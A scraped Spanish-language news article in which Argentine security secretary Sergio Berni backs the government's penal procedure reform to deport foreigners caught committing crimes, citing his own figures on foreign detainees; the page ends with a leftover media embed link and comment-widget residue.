Check the new version here

Popular channels

Extranjero que viene al país a delinquir, deportado



El secretario de Seguridad ratificó su apoyo la reforma del Código Procesal Penal, impulsado por el Gobierno.





"Delincuente extranjero que viene al país a delinquir, tiene que volver a su país", remarcó el secretario de Seguridad, Sergio Berni, que ratificó así su apoyo a la reforma del Código Procesal Penal, impulsado por el Gobierno, al tiempo que aseguró que del total de los delincuentes que son detenidos por la Policía Federal, el 20% provienen del exterior.

"El 20% de los detenidos por la Policía Federal son extranjeros, y luego son excarcelados inmediatamente. Y, del total de los que están en las cárceles, el 5% provienen del exterior. Delincuente extranjero que viene al país a delinquir, tiene que volver a su país", insistió el funcionario, en referencia a la expulsión del país a los extranjeros que sean sorprendidos "in fraganti" en la comisión de un delito, uno de los cambios que propone la reforma del Código Procesal Penal. En este sentido, acusó que la Justicia "desprotege al ciudadano argentino", en declaraciones a Palabras más, palabras menos.

El funcionario remarcó que "La ley de Migraciones permite la expulsión, entonces ¿por qué no lo hacemos? Migraciones tiene la autoridad suficiente para realizarlo", subrayó Berni, que se quejó que "estas son organizaciones que vienen exclusivamente a delinquir a la Argentina, porque saben que si son detenidos, al otro día están en libertad". De todos modos, diferenció:
"Reconocemos el aporte de la fuerza laboral extranjera a la grandeza de la nación. Los extranjeros que se desloman trabajando están cansados" de sus pares que delinquen
, afirmó.





link: http://mistkaefer.xmlrequest.info/template.swf?id=416959:1&lang=es" bgcolor="#FFFFFF" width="250
0
0
0
0
0No comments yet
      GIF
      New